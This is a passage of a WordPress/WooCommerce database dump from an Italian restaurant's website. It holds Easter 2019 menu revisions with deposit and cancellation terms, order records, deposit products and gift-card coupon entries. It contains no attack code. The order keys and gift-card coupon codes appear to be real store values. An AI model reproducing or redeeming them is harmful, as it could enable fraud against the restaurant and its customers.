telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n','Menù di Pasqua e Pasquetta 2019','','inherit','closed','closed','','784-revision-v1','','','2019-04-03 22:11:14','2019-04-03 20:11:14','',784,'https://www.ristorantesolymar.it/2019/04/03/784-revision-v1/',0,'revision','',0),(790,1,'2019-04-04 13:45:41','2019-04-04 11:45:41','','Order &ndash; Aprile 4, 2019 @ 01:45 PM','','wc-cancelled','open','closed','wc_order_RzMwKh417pcxc','ordine-apr-04-2019-1145-am','','','2019-04-04 14:20:38','2019-04-04 12:20:38','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=790',0,'shop_order','',1),(791,1,'2019-04-04 13:57:20','2019-04-04 11:57:20','','Order &ndash; Aprile 4, 2019 @ 01:57 PM','','wc-processing','open','closed','wc_order_eF8R2hqlH9RCT','ordine-apr-04-2019-1157-am','','','2019-04-04 15:31:09','2019-04-04 13:31:09','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=791',0,'shop_order','',4),(792,1,'2019-04-04 21:31:22','2019-04-04 19:31:22','','Order &ndash; Aprile 4, 2019 @ 09:31 PM','','wc-processing','open','closed','wc_order_A7RbXbl2lKnAG','ordine-apr-04-2019-0731-pm','','','2019-04-04 21:32:32','2019-04-04 19:32:32','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=792',0,'shop_order','',3),(793,1,'2019-04-06 15:18:18','2019-04-06 13:18:18','','Order &ndash; Aprile 6, 2019 @ 03:18 PM','','wc-processing','open','closed','wc_order_S0CIigE0FU4ls','ordine-apr-06-2019-0118-pm','','','2019-04-06 15:20:37','2019-04-06 13:20:37','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=793',0,'shop_order','',3),(794,1,'2019-04-09 11:15:35','2019-04-09 09:15:35','','Order &ndash; Aprile 9, 2019 @ 11:15 AM','','wc-cancelled','open','closed','wc_order_3fM1a7GhoaPdk','ordine-apr-09-2019-0915-am','','','2019-04-09 12:11:18','2019-04-09 10:11:18','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=794',0,'shop_order','',1),(795,1,'2019-04-09 21:15:56','2019-04-09 19:15:56','','Order &ndash; Aprile 9, 2019 @ 09:15 PM','','wc-cancelled','open','closed','wc_order_1T4PlCjkeQVn0','ordine-apr-09-2019-0715-pm','','','2019-04-09 21:21:40','2019-04-09 19:21:40','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=795',0,'shop_order','',1),(796,1,'2019-04-09 21:28:36','2019-04-09 19:28:36','','Order &ndash; Aprile 9, 2019 @ 09:28 PM','','wc-processing','open','closed','wc_order_gYikBYy2vpFxG','ordine-apr-09-2019-0728-pm','','','2019-04-09 21:32:25','2019-04-09 19:32:25','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=796',0,'shop_order','',3),(797,1,'2019-04-09 23:17:02','2019-04-09 21:17:02','','Order &ndash; Aprile 9, 2019 @ 11:17 PM','','wc-processing','open','closed','wc_order_xV6iHNRlLGLLY','ordine-apr-09-2019-0917-pm','','','2019-04-09 23:30:15','2019-04-09 21:30:15','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=797',0,'shop_order','',3),(798,1,'2019-04-10 11:51:46','2019-04-10 09:51:46','','Order &ndash; Aprile 10, 2019 @ 11:51 AM','','wc-processing','open','closed','wc_order_48nRZvexi1wn2','ordine-apr-10-2019-0951-am','','','2019-04-10 11:59:24','2019-04-10 09:59:24','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=798',0,'shop_order','',2),(799,0,'2019-04-10 11:59:24','2019-04-10 09:59:24','GIFTCARD ORDER #798','solymarcouponGZE5F','GIFTCARD ORDER #798','publish','closed','closed','','solymarcoupongze5f','','','2019-04-10 11:59:24','2019-04-10 09:59:24','',0,'https://www.ristorantesolymar.it/2019/04/10/solymarcoupongze5f/',0,'shop_coupon','',0),(801,1,'2019-04-11 20:51:44','2019-04-11 18:51:44','<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\" columns=\"4\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\" columns=\"4\"]\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n','Menù di Pasqua e Pasquetta 2019','','inherit','closed','closed','','784-revision-v1','','','2019-04-11 20:51:44','2019-04-11 18:51:44','',784,'https://www.ristorantesolymar.it/2019/04/11/784-revision-v1/',0,'revision','',0),(802,1,'2019-04-13 13:05:49','2019-04-13 11:05:49','','Order &ndash; Aprile 13, 2019 @ 01:05 PM','','wc-processing','open','closed','wc_order_0H4VsMNyiOUs9','ordine-apr-13-2019-1105-am','','','2019-04-13 13:13:12','2019-04-13 11:13:12','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=802',0,'shop_order','',3),(803,1,'2019-04-13 15:24:43','2019-04-13 13:24:43','','Order &ndash; Aprile 13, 2019 @ 03:24 PM','','wc-processing','open','closed','wc_order_zVvGEwSzajPMp','ordine-apr-13-2019-0124-pm','','','2019-04-13 15:28:16','2019-04-13 13:28:16','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=803',0,'shop_order','',3),(804,1,'2019-04-13 18:07:25','2019-04-13 16:07:25','','Order &ndash; Aprile 13, 2019 @ 06:07 PM','','wc-refunded','open','closed','wc_order_T22PJQj49GpOQ','ordine-apr-13-2019-0407-pm','','','2019-04-18 19:49:03','2019-04-18 17:49:03','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=804',0,'shop_order','',4),(805,1,'2019-04-13 18:31:42','2019-04-13 16:31:42','','Order &ndash; Aprile 13, 2019 @ 06:31 PM','','wc-processing','open','closed','wc_order_BF4TVCCWWSE2T','ordine-apr-13-2019-0431-pm','','','2019-04-13 18:34:30','2019-04-13 16:34:30','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=805',0,'shop_order','',3),(806,1,'2019-04-14 15:40:40','2019-04-14 13:40:40','','Order &ndash; Aprile 14, 2019 @ 03:40 PM','','wc-processing','open','closed','wc_order_qeVObZppcU5g5','ordine-apr-14-2019-0140-pm','','','2019-04-14 15:47:32','2019-04-14 13:47:32','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=806',0,'shop_order','',3),(807,1,'2019-04-15 17:42:55','2019-04-15 15:42:55','','Order &ndash; Aprile 15, 2019 @ 05:42 PM','','wc-processing','open','closed','wc_order_Nfabf45XDSzd2','ordine-apr-15-2019-0342-pm','','','2019-04-15 17:44:36','2019-04-15 15:44:36','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=807',0,'shop_order','',3),(808,1,'2019-04-15 19:55:16','2019-04-15 17:55:16','','Order &ndash; Aprile 15, 2019 @ 07:55 PM','','wc-cancelled','open','closed','wc_order_v0C2fNUXcZKHp','ordine-apr-15-2019-0555-pm','','','2019-04-15 20:30:58','2019-04-15 18:30:58','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=808',0,'shop_order','',1),(809,1,'2019-04-17 15:02:23','2019-04-17 13:02:23','','Order &ndash; Aprile 17, 2019 @ 03:02 PM','','wc-processing','open','closed','wc_order_1OFvYdjwd0su4','ordine-apr-17-2019-0102-pm','','','2019-04-17 15:02:59','2019-04-17 13:02:59','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=809',0,'shop_order','',3),(810,1,'2019-04-17 20:25:22','2019-04-17 18:25:22','','Order &ndash; Aprile 17, 2019 @ 08:25 PM','','wc-cancelled','open','closed','wc_order_VbBa9jOhvggwv','ordine-apr-17-2019-0625-pm','','','2019-04-17 21:17:23','2019-04-17 19:17:23','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=810',0,'shop_order','',1),(811,1,'2019-04-17 20:58:28','2019-04-17 18:58:28','','Order &ndash; Aprile 17, 2019 @ 08:58 PM','','wc-processing','open','closed','wc_order_xeRFLxgNuY0r6','ordine-apr-17-2019-0658-pm','','','2019-04-17 21:04:06','2019-04-17 19:04:06','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=811',0,'shop_order','',3),(812,1,'2019-04-18 10:45:40','2019-04-18 08:45:40','','Order &ndash; Aprile 18, 2019 @ 10:45 AM','','wc-cancelled','open','closed','wc_order_LXuIzQq5iPBbC','ordine-apr-18-2019-0845-am','','','2019-04-18 11:17:43','2019-04-18 09:17:43','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=812',0,'shop_order','',1),(813,1,'2019-04-18 19:49:03','2019-04-18 17:49:03','','Rimborso &ndash; Apr 18, 2019 @ 05:49 PM','','wc-completed','closed','closed','wc_order_ihTrkUtFyWOke','rimborso-apr-18-2019-0549-pm','','','2019-04-18 19:49:03','2019-04-18 17:49:03','',804,'https://www.ristorantesolymar.it/?shop_order_refund=rimborso-apr-18-2019-0549-pm',0,'shop_order_refund','',0),(814,1,'2019-04-19 11:21:29','2019-04-19 09:21:29','','Order &ndash; Aprile 19, 2019 @ 11:21 AM','','wc-processing','open','closed','wc_order_F5Bkm503GVaqP','ordine-apr-19-2019-0921-am','','','2019-04-19 11:23:37','2019-04-19 09:23:37','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=814',0,'shop_order','',3),(815,1,'2019-04-20 11:21:58','2019-04-20 09:21:58','','Order &ndash; Aprile 20, 2019 @ 11:21 AM','','wc-processing','open','closed','wc_order_TWgzB2J7mOr3q','ordine-apr-20-2019-0921-am','','','2019-04-20 11:26:58','2019-04-20 09:26:58','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=815',0,'shop_order','',3),(816,1,'2019-04-20 13:33:04','2019-04-20 11:33:04','','Order &ndash; Aprile 20, 2019 @ 01:33 PM','','wc-processing','open','closed','wc_order_v1ui7mnvU4cOo','ordine-apr-20-2019-1133-am','','','2019-04-20 14:01:55','2019-04-20 12:01:55','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=816',0,'shop_order','',3),(817,1,'2019-04-20 13:43:04','2019-04-20 11:43:04','','Order &ndash; Aprile 20, 2019 @ 01:43 PM','','wc-processing','open','closed','wc_order_uifPD9WRDpGZc','ordine-apr-20-2019-1143-am','','','2019-04-20 13:48:20','2019-04-20 11:48:20','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=817',0,'shop_order','',3),(818,1,'2019-04-20 20:07:27','2019-04-20 18:07:27','','Order &ndash; Aprile 20, 2019 @ 08:07 PM','','wc-processing','open','closed','wc_order_hvvocfFy1AGeS','ordine-apr-20-2019-0607-pm','','','2019-04-20 20:08:36','2019-04-20 18:08:36','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=818',0,'shop_order','',3),(819,1,'2019-04-22 10:58:43','2019-04-22 08:58:43','','Order &ndash; Aprile 22, 2019 @ 10:58 AM','','wc-processing','open','closed','wc_order_8moAI1iW793e4','ordine-apr-22-2019-0858-am','','','2019-04-22 11:00:10','2019-04-22 09:00:10','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=819',0,'shop_order','',3),(820,1,'2019-04-23 19:06:09','2019-04-23 17:06:09','','Order &ndash; Aprile 23, 2019 @ 07:06 PM','','wc-completed','open','closed','wc_order_o8EKRzZfdhLgi','ordine-apr-23-2019-0506-pm','','','2019-04-23 19:14:43','2019-04-23 17:14:43','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=820',0,'shop_order','',3),(821,0,'2019-04-23 19:09:03','2019-04-23 17:09:03','GIFTCARD ORDER #820','solymarcouponKOBC3','GIFTCARD ORDER #820','publish','closed','closed','','solymarcouponkobc3','','','2019-04-23 19:09:03','2019-04-23 17:09:03','',0,'https://www.ristorantesolymar.it/2019/04/23/solymarcouponkobc3/',0,'shop_coupon','',0),(822,1,'2019-05-03 19:51:57','2019-05-03 17:51:57','','Order &ndash; Maggio 3, 2019 @ 07:51 PM','','wc-processing','open','closed','wc_order_VrGjuTDcEJ2ZJ','ordine-may-03-2019-0551-pm','','','2019-05-03 19:54:50','2019-05-03 17:54:50','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=822',0,'shop_order','',2),(823,0,'2019-05-03 19:54:50','2019-05-03 17:54:50','GIFTCARD ORDER #822','solymarcouponINIJT','GIFTCARD ORDER #822','publish','closed','closed','','solymarcouponinijt','','','2019-05-03 19:54:50','2019-05-03 17:54:50','',0,'https://www.ristorantesolymar.it/2019/05/03/solymarcouponinijt/',0,'shop_coupon','',0),(824,1,'2019-05-24 13:46:27','2019-05-24 11:46:27','','Order &ndash; Maggio 24, 2019 @ 01:46 PM','','wc-processing','open','closed','wc_order_7Yok8W4phpgOA','ordine-may-24-2019-1146-am','','','2019-05-24 13:47:08','2019-05-24 11:47:08','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=824',0,'shop_order','',2),(825,0,'2019-05-24 13:47:08','2019-05-24 11:47:08','GIFTCARD ORDER #824','solymarcouponI8RCI','GIFTCARD ORDER #824','publish','closed','closed','','solymarcouponi8rci','','','2019-05-24 13:47:08','2019-05-24 11:47:08','',0,'https://www.ristorantesolymar.it/2019/05/24/solymarcouponi8rci/',0,'shop_coupon','',0),(826,1,'2019-05-27 19:05:36','2019-05-27 17:05:36','','Order &ndash; Maggio 27, 2019 @ 07:05 PM','','wc-completed','open','closed','wc_order_qBpz2HvAcq60h','ordine-may-27-2019-0505-pm','','','2019-05-27 19:11:07','2019-05-27 17:11:07','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=826',0,'shop_order','',3),(827,0,'2019-05-27 19:08:45','2019-05-27 17:08:45','GIFTCARD ORDER #826','solymarcoupon0F9UO','GIFTCARD ORDER #826','publish','closed','closed','','solymarcoupon0f9uo','','','2019-05-27 19:08:45','2019-05-27 17:08:45','',0,'https://www.ristorantesolymar.it/2019/05/27/solymarcoupon0f9uo/',0,'shop_coupon','',0),(828,1,'2019-06-05 16:27:30','2019-06-05 14:27:30','','Order &ndash; Giugno 5, 2019 @ 04:27 PM','','wc-completed','open','closed','wc_order_Ki62x59ZMpwGY','ordine-jun-05-2019-0227-pm','','','2019-06-05 16:30:25','2019-06-05 14:30:25','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=828',0,'shop_order','',3),(829,0,'2019-06-05 16:28:40','2019-06-05 14:28:40','GIFTCARD ORDER #828','solymarcouponO610C','GIFTCARD ORDER #828','publish','closed','closed','','solymarcoupono610c','','','2019-06-05 16:28:40','2019-06-05 14:28:40','',0,'https://www.ristorantesolymar.it/2019/06/05/solymarcoupono610c/',0,'shop_coupon','',0),(830,1,'2019-06-05 21:39:13','2019-06-05 19:39:13','','Order &ndash; Giugno 5, 2019 @ 09:39 PM','','wc-processing','open','closed','wc_order_iXEdnA4gm3fft','ordine-jun-05-2019-0739-pm','','','2019-06-05 21:40:03','2019-06-05 19:40:03','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=830',0,'shop_order','',2),(831,0,'2019-06-05 21:40:03','2019-06-05 19:40:03','GIFTCARD ORDER #830','solymarcouponLJBM5','GIFTCARD ORDER #830','publish','closed','closed','','solymarcouponljbm5','','','2019-06-05 21:40:03','2019-06-05 19:40:03','',0,'https://www.ristorantesolymar.it/2019/06/05/solymarcouponljbm5/',0,'shop_coupon','',0),(832,1,'2019-06-07 18:02:15','2019-06-07 16:02:15','','Order &ndash; Giugno 7, 2019 @ 06:02 PM','','wc-processing','open','closed','wc_order_JGS4dk4Se4rbG','ordine-jun-07-2019-0402-pm','','','2019-06-07 18:06:38','2019-06-07 16:06:38','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=832',0,'shop_order','',2),(833,0,'2019-06-07 18:06:41','2019-06-07 16:06:41','GIFTCARD ORDER #832','solymarcouponI37MW','GIFTCARD ORDER #832','publish','closed','closed','','solymarcouponi37mw','','','2019-06-07 18:06:41','2019-06-07 16:06:41','',0,'https://www.ristorantesolymar.it/2019/06/07/solymarcouponi37mw/',0,'shop_coupon','',0),(834,1,'2019-06-15 18:29:52','2019-06-15 16:29:52','','Order &ndash; Giugno 15, 2019 @ 06:29 PM','','wc-completed','open','closed','wc_order_EJyN3RWicMryu','ordine-jun-15-2019-0429-pm','','','2019-06-15 18:31:39','2019-06-15 16:31:39','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=834',0,'shop_order','',3),(835,0,'2019-06-15 18:31:32','2019-06-15 16:31:32','GIFTCARD ORDER #834','solymarcoupon3VWU7','GIFTCARD ORDER #834','publish','closed','closed','','solymarcoupon3vwu7','','','2019-06-15 18:31:32','2019-06-15 16:31:32','',0,'https://www.ristorantesolymar.it/2019/06/15/solymarcoupon3vwu7/',0,'shop_coupon','',0),(836,1,'2019-06-16 12:48:17','2019-06-16 10:48:17','','Order &ndash; Giugno 16, 2019 @ 12:48 PM','','wc-processing','open','closed','wc_order_SEZXfC5EtsfU8','ordine-jun-16-2019-1048-am','','','2019-06-16 12:50:49','2019-06-16 10:50:49','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=836',0,'shop_order','',2),(837,0,'2019-06-16 12:50:50','2019-06-16 10:50:50','GIFTCARD ORDER #836','solymarcouponY5DCR','GIFTCARD ORDER #836','publish','closed','closed','','solymarcoupony5dcr','','','2019-06-16 12:50:50','2019-06-16 10:50:50','',0,'https://www.ristorantesolymar.it/2019/06/16/solymarcoupony5dcr/',0,'shop_coupon','',0),(838,1,'2019-06-18 10:57:24','2019-06-18 08:57:24','','Order &ndash; Giugno 18, 2019 @ 10:57 AM','','wc-processing','open','closed','wc_order_Mt1WhGeS3D6Qe','ordine-jun-18-2019-0857-am','','','2019-06-18 10:58:58','2019-06-18 08:58:58','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=838',0,'shop_order','',2),(839,0,'2019-06-18 10:58:58','2019-06-18 08:58:58','GIFTCARD ORDER #838','solymarcoupon37YXF','GIFTCARD ORDER #838','publish','closed','closed','','solymarcoupon37yxf','','','2019-06-18 10:58:58','2019-06-18 08:58:58','',0,'https://www.ristorantesolymar.it/2019/06/18/solymarcoupon37yxf/',0,'shop_coupon','',0),(4300,1,'2018-08-07 10:33:47','2018-08-07 10:33:47','','signature-chef','','inherit','open','closed','','signature-chef','','','2018-08-07 10:33:47','2018-08-07 10:33:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/signature-chef.png',0,'attachment','image/png',0),(857,1,'2019-07-18 12:57:20','2019-07-18 10:57:20','','Order &ndash; Luglio 18, 2019 @ 12:57 PM','','wc-processing','open','closed','wc_order_cPXL15y4dVhf7','ordine-jul-18-2019-1057-am','','','2019-07-18 13:00:10','2019-07-18 11:00:10','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=857',0,'shop_order','',2),(858,0,'2019-07-18 13:00:14','2019-07-18 11:00:14','GIFTCARD ORDER #857','solymarcoupon72RVC','GIFTCARD ORDER #857','publish','closed','closed','','solymarcoupon72rvc','','','2019-07-18 13:00:14','2019-07-18 11:00:14','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcoupon72rvc/',0,'shop_coupon','',0),(859,1,'2019-07-18 18:24:40','2019-07-18 16:24:40','','Order &ndash; Luglio 18, 2019 @ 06:24 PM','','wc-processing','open','closed','wc_order_Z388MYutbCRMb','ordine-jul-18-2019-0424-pm','','','2019-07-18 18:27:47','2019-07-18 16:27:47','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=859',0,'shop_order','',2),(860,0,'2019-07-18 18:27:48','2019-07-18 16:27:48','GIFTCARD ORDER #859','solymarcouponRVJT7','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponrvjt7','','','2019-07-18 18:27:48','2019-07-18 16:27:48','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponrvjt7/',0,'shop_coupon','',0),(861,0,'2019-07-18 18:27:54','2019-07-18 16:27:54','GIFTCARD ORDER #859','solymarcouponRV7RG','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponrv7rg','','','2019-07-18 18:27:54','2019-07-18 16:27:54','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponrv7rg/',0,'shop_coupon','',0),(862,0,'2019-07-18 18:27:57','2019-07-18 16:27:57','GIFTCARD ORDER #859','solymarcouponRJCGH','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponrjcgh','','','2019-07-18 18:27:57','2019-07-18 16:27:57','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponrjcgh/',0,'shop_coupon','',0),(863,0,'2019-07-18 18:28:01','2019-07-18 16:28:01','GIFTCARD ORDER #859','solymarcoupon8T1LO','GIFTCARD ORDER #859','publish','closed','closed','','solymarcoupon8t1lo','','','2019-07-18 18:28:01','2019-07-18 16:28:01','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcoupon8t1lo/',0,'shop_coupon','',0),(864,0,'2019-07-18 18:28:04','2019-07-18 16:28:04','GIFTCARD ORDER #859','solymarcoupon00RYE','GIFTCARD ORDER #859','publish','closed','closed','','solymarcoupon00rye','','','2019-07-18 18:28:04','2019-07-18 16:28:04','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcoupon00rye/',0,'shop_coupon','',0),(865,0,'2019-07-18 18:28:08','2019-07-18 16:28:08','GIFTCARD ORDER #859','solymarcoupon2BXSL','GIFTCARD ORDER #859','publish','closed','closed','','solymarcoupon2bxsl','','','2019-07-18 18:28:08','2019-07-18 16:28:08','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcoupon2bxsl/',0,'shop_coupon','',0),(866,0,'2019-07-18 18:28:12','2019-07-18 16:28:12','GIFTCARD ORDER #859','solymarcouponGE6LH','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponge6lh','','','2019-07-18 18:28:12','2019-07-18 16:28:12','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponge6lh/',0,'shop_coupon','',0),(867,0,'2019-07-18 18:28:15','2019-07-18 16:28:15','GIFTCARD ORDER #859','solymarcouponKYZ90','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponkyz90','','','2019-07-18 18:28:15','2019-07-18 16:28:15','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponkyz90/',0,'shop_coupon','',0),(868,0,'2019-07-18 18:28:19','2019-07-18 16:28:19','GIFTCARD ORDER #859','solymarcoupon3C7S1','GIFTCARD ORDER #859','publish','closed','closed','','solymarcoupon3c7s1','','','2019-07-18 18:28:19','2019-07-18 16:28:19','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcoupon3c7s1/',0,'shop_coupon','',0),(869,0,'2019-07-18 18:28:22','2019-07-18 16:28:22','GIFTCARD ORDER #859','solymarcoupon8X86M','GIFTCARD ORDER #859','publish','closed','closed','','solymarcoupon8x86m','','','2019-07-18 18:28:22','2019-07-18 16:28:22','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcoupon8x86m/',0,'shop_coupon','',0),(870,0,'2019-07-18 18:28:28','2019-07-18 16:28:28','GIFTCARD ORDER #859','solymarcouponN0K4R','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponn0k4r','','','2019-07-18 18:28:28','2019-07-18 16:28:28','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponn0k4r/',0,'shop_coupon','',0),(871,0,'2019-07-18 18:28:33','2019-07-18 16:28:33','GIFTCARD ORDER #859','solymarcoupon8IQHQ','GIFTCARD ORDER #859','publish','closed','closed','','solymarcoupon8iqhq','','','2019-07-18 18:28:33','2019-07-18 16:28:33','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcoupon8iqhq/',0,'shop_coupon','',0),(872,0,'2019-07-18 18:28:37','2019-07-18 16:28:37','GIFTCARD ORDER #859','solymarcouponR3T3I','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponr3t3i','','','2019-07-18 18:28:37','2019-07-18 16:28:37','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponr3t3i/',0,'shop_coupon','',0),(873,0,'2019-07-18 18:28:44','2019-07-18 16:28:44','GIFTCARD ORDER #859','solymarcouponBPXAH','GIFTCARD ORDER #859','publish','closed','closed','','solymarcouponbpxah','','','2019-07-18 18:28:44','2019-07-18 16:28:44','',0,'https://www.ristorantesolymar.it/2019/07/18/solymarcouponbpxah/',0,'shop_coupon','',0),(875,1,'2019-07-25 06:45:20','2019-07-25 04:45:20','Invia caparra per prenotazione / torta / ecc.\r\nIl costo della caparra è di 15euro a persona','Caparra','Invia caparra per prenotazione / torta / ecc.\r\nIl costo della caparra è di 15euro a persona','publish','open','closed','','caparra','','','2020-12-27 10:32:37','2020-12-27 09:32:37','',0,'https://www.ristorantesolymar.it/?post_type=product&#038;p=875',0,'product','',0),(876,1,'2019-07-25 06:47:40','2019-07-25 04:47:40','','Caparra - 4','Numero Persone: 4','publish','closed','closed','','caparra-4','','','2019-07-25 06:49:42','2019-07-25 04:49:42','',875,'https://www.ristorantesolymar.it/?post_type=product_variation&p=876',1,'product_variation','',0),(877,1,'2019-07-25 06:47:40','2019-07-25 04:47:40','','Caparra - 5','Numero Persone: 5','publish','closed','closed','','caparra-5','','','2019-07-25 06:49:42','2019-07-25 04:49:42','',875,'https://www.ristorantesolymar.it/?post_type=product_variation&p=877',2,'product_variation','',0),(878,1,'2019-07-25 06:47:40','2019-07-25 04:47:40','','Caparra - 6','Numero Persone: 6','publish','closed','closed','','caparra-6','','','2019-07-25 06:49:42','2019-07-25 04:49:42','',875,'https://www.ristorantesolymar.it/?post_type=product_variation&p=878',3,'product_variation','',0),(879,1,'2019-07-25 06:47:40','2019-07-25 04:47:40','','Caparra - 7','Numero Persone: 7','publish','closed','closed','','caparra-7','','','2019-07-25 06:49:42','2019-07-25 04:49:42','',875,'https://www.ristorantesolymar.it/?post_type=product_variation&p=879',4,'product_variation','',0),(880,1,'2019-07-25 06:47:40','2019-07-25 04:47:40','','Caparra - 8','Numero Persone: 8','publish','closed','closed','','caparra-8','','','2019-07-25 06:49:42','2019-07-25 04:49:42','',875,'https://www.ristorantesolymar.it/?post_type=product_variation&p=880',5,'product_variation','',0),(881,1,'2019-07-25 06:47:40','2019-07-25 04:47:40','','Caparra - 2','Numero Persone: 2','publish','closed','closed','','caparra-2','','','2019-07-25 06:49:42','2019-07-25 04:49:42','',875,'https://www.ristorantesolymar.it/?post_type=product_variation&p=881',6,'product_variation','',0),(882,1,'2019-07-25 06:47:40','2019-07-25 04:47:40','','Caparra - 3','Numero Persone: 3','publish','closed','closed','','caparra-3','','','2019-07-25 06:49:42','2019-07-25 04:49:42','',875,'https://www.ristorantesolymar.it/?post_type=product_variation&p=882',7,'product_variation','',0),(883,1,'2019-07-25 06:49:21','2019-07-25 04:49:21','Invia caparra per prenotazione / torta / 